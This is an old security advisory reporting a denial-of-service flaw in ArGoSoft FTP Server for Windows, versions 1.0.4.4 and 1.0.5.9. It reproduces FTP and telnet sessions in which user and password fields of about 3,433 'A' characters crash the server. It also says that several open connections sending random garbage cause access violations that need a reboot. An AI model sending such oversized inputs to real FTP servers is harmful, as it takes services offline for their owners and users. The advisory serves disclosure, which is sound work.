COMMAND
ArGoSoft FTP Server
SYSTEMS AFFECTED
ArGoSoft FTP Server, Version 1.04 (1.0.4.4) for win*
PROBLEM
Knud Erik Hjgaard found following:
ftp>o x*x*x*X*x*.dk
220 ArGoSoft FTP Server, Version 1.04 (1.0.4.4)
User (x*x*x*X*x*.dk:(none)): anonymous
331 User name OK, please send complete E-mail address as password
Password: (lamer@)
230 User anonymous logged in successfully
ftp> ls
Connection closed by remote host.
This puzzled him somewhat as he never saw that before... so he
started fooling around..whoa whaddya know... Actually this was
somewhat unprecise; he had no clue on buffer overruns and so on,
but he brought down the ftpd... He did like this:
telnet x*x*x*X*x*.dk 21
220 ArGoSoft FTP Server, Version 1.04 (1.0.4.4)
user [AAAAA(3433 A's to be precise)AAA]
*no response*
pass [AAAAA(3433 A's to be precise)AAA]
*no response*
quit
*no response*
and once more from the start...and hey presto, server stopped
accepting connections at port 21. Less A's should do the trick,
(he didnt see all 3433 a's in the CRT window) but as the server
died he can't really experiment with it...
The latest version (1.0.5.9, February 23, 2000 release) can be
obtained from www.argosoft.com. This version is also vulnerable.
Knud installed it on his WinNT 4.00.1381 with IE 5.5.00.2314.1003
and SP5 ... after a couple of simultaneous connections (3) with
the
user [AAAA]
pass [AAAAA]
and just random garbage like
dfsasdfdssd
adsfadslkfjadsl
dslfhjslakhsdkj
gkljdflkgsdf
and so on (this seems to be doing the trick?) and letting the
connections stay open, nt spits out a couple of hundred access
violation at address [0040372!? - the windows all closed] boxes.
After a few crashes windows says '[10048] address already in use'
when you try starting the server. Only way to start the server
again is a reboot.
SOLUTION
Nothing yes.